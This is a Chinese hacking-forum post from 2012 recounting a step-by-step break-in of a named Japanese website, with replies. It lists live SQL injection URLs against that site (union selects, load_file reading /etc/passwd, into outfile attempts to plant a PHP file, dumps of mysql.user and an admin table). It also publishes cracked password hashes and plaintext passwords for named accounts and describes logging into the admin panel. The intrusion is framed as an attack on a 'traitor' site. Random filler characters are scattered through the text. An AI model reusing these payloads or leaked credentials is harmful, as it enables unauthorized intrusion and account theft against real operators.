找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
返回列表 发新帖
查看: 3845|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

$ f- D( ?4 s: @0 N3 [2 z: U
- _1 Z0 F" k7 `# o+ c) z  J3 g6 ~0x01. 检测 www.zuaa.jp 收集数据- N. J+ m6 P! d* _4 X" N

$ J7 R- m4 d( t( U) c/ a6 A$ J' m! _3 j  ?/ {9 T3 B
whatweb1 l" y9 h8 h1 Y, C( X% c
! T5 q' ~4 `4 D  x0 Q
4 u9 q8 q+ F- p' ^9 M
利用NMAP扫描
# z; w5 Y; N$ Y# T  }# z4 b) y8 ~! [
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持8 o- j6 g! G# g. f
0x02.找注入点& n/ V1 B& C4 {- u8 V2 e
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3905 d7 _% _$ r! l5 b9 t) g
' y5 F- b, _. v* e  A+ r& |

8 k1 O6 S  ~' o7 Y* t0x03.order by5 r! U4 _5 r# X% n
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
6 Q5 b5 G4 g( K' m! g& l
9 f) t$ u* x- |* W, Z2 aorder by 28报错,order by 27正常8 _# L6 V5 [5 M2 U! W% K
' u5 v3 O' U% n* p" s! n
0x04.   union手动查询
# p: Y. l+ j' v" _' o3 ahttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 : Q, `) N3 Z  A% H8 E: [) {, f: Y* V2 ~
添加到 27 时正常显示
+ Z: M/ ]" ]( D# {% G! Q! Q  j* Q
$ U1 }. [% f. w) g% }中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持$ h% [8 s8 x) {4 u) R6 B
3 C  y- d6 G) s4 A9 u8 }3 {
0x05. info:
1 f1 V9 r' p7 g3 R, ?$ K8 ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
; y; p- t0 R2 S( g
, d2 z. D5 i5 [* puser:            root@localhost
6 n- k2 l; n9 P9 h( W6 Cdatabase:    openpne/ f, N7 p4 c0 M
version:      4.1.22+ b, G  i" B# \2 J9 N
os:             portbld-freebsd5.42 X, U- m2 {' ?1 a) o& ~2 x
9 ]# c& n/ {! M
0x06. root用户  I" y8 m$ B& P3 Y
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
4 g& b. S" p4 W, k% V: jhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
: G2 q1 p# P+ x# y, j7 ?  z. s
$ J8 h0 K; z+ y9 C0 S通过工具转换4 ~/ @$ H- i% s

+ W$ G( ?  J" j$ E中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
5 m6 Z& s3 D4 Z: V' Z0 X- f; p0 u: O( }. Z4 [" d; q
0x07. 利用 into outfile! @# n* T0 J( Q' I' s  p
全部都失败: ]! ~* Y2 |9 }( w  O
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php( O& n$ `1 S+ e. E0 Y9 J
" P* _' D! c0 \- b# \* z3 q
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
9 d6 z" @; v) c3 \% @0 L, d9 e* c4 u0 }( ]
页面显示“MDB2 Error:syntax error”
  s. j' A, N& j' {4 L( }; t1 I: b9 ^* @, X& u* Q7 J1 q, x0 W' a
0x08. 利用 mysql 4.1$ p1 }6 c3 }* ~1 j6 C  M
猜常规表名,字段未果 工具 sqlmap
% Q6 b9 m, c) C6 q. C! I! g# N, D中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
2 v2 b& S4 f( \' u. f" p3 W( T' q  L: ]' b2 K. q

- z0 Y( ~) M5 ]& I8 }& I4 [1 }, N) v4 F- I- R
0x09. 查找后台* b& p8 ~3 P8 P. n7 z$ |8 w
利用 现有的各种 后台工具尝试都不行
# J' u9 @+ `. Z& y+ G  n. ~: s, `1 ]% x& [: |
0x10.  MySL外联方法
6 W8 Z6 V- A% j. \! B2 u从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行$ I  u+ C5 b2 {. _5 {4 d% z
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user( h/ x* s* P+ B" E$ d
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user3 k* m5 L' ^' W( x# A% l
* H2 h5 h$ _0 {* ~
这个可以在 www.cmd5.com 解密) j: p1 s* E9 W' u# J% M4 j$ q: {  {
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20091 w, L) {5 ?0 \4 J$ w8 o5 D+ V0 H
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
* E4 F6 z1 G5 |5 ]7 Fopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
* S5 O/ Q7 r6 a. {( Y4 Czuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
$ w& `( A' a1 R1 [! q0 L, E" w2 ?1 i工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知) _6 f  h7 N8 J0 n6 K# _

% G' C. D  p( m7 c- J( V* b! T6 w" _/ {) S& O+ i
0x11. 网站突破7 j2 @6 u. Q& y& k) H
发现网站的源程序 openpne, google 下载 openpne 源码7 a* S" j3 W4 t
! l4 v- t8 ~  t& R) z7 H
& H- {- x! I' a* y& r5 K, M, [
0x12. 默认信息利用! J1 d8 v! ^  ?
http://sns.zuaa.jp/?m=admin&a=page_login
% X& K/ S1 {5 e0 U! d7 E7 J  z' }, s; f; G) f/ H! z( b
表名 (c_admin_user) ,字段名(username,password)
9 S9 _0 r2 t# Z5 i5 W; Thttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
4 @3 Q+ @" p5 R+ l3 \2 N
7 r* ~6 J& }, p% ~2 E解密, _. s3 H9 v! [- T8 R/ u
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009" |* `" W4 J7 ]; w# J. ~
zuaajp:c0923ec5857796a393da99905008c176,          zju18975 `! c; B6 `' N& N6 `2 N0 n

+ J+ U  w8 L5 w. k+ {中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
, C/ |, k# w  i' |) r6 Z3 F0 ?/ i4 E2 d) N. [
0x13. 登录后台
8 i1 }' c1 |" m. u
/ Z; f- A2 n" p( r
6 K; D0 }3 I  E# D. G: P/ G- d$ \
0x14. 小结
% F0 @( W; @% u# y$ Q& G利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
  M* x0 Y  _% A" f感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点6 K/ P4 Q- N0 `% F9 I  y0 i  D
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain& k$ L3 P5 b/ E: |# c  f5 w
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
( g" I9 a  @' t4 `- b5 L  Y0 ~0 p5 n4 ?' ]$ ]3 U0 P
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
% G* y6 c0 \5 J- x* G, C

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表